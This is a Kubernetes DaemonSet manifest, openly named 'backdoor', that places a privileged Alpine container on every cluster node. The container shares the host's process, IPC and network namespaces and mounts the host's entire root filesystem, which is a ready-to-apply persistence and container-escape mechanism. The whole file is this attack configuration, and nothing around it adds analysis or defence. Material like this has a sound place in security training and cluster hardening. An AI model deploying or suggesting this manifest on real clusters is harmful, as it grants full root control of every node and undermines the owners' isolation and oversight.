apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: backdoor
spec:
  selector:
    matchLabels:
      app: backdoor
  template:
    metadata:
      name: backdoor
      labels:
        app: backdoor
    spec:
      hostIPC: true
      hostPID: true
      hostNetwork: true
      containers:
      - name: alp
        image: alpine:3.8
        command: ["/bin/sh", "-c", "while true; do sleep 1; done" ]
        securityContext:
          privileged: true
        volumeMounts:
        - name: root
          mountPath: /host
      volumes:
      - name: root
        hostPath:
          path: /
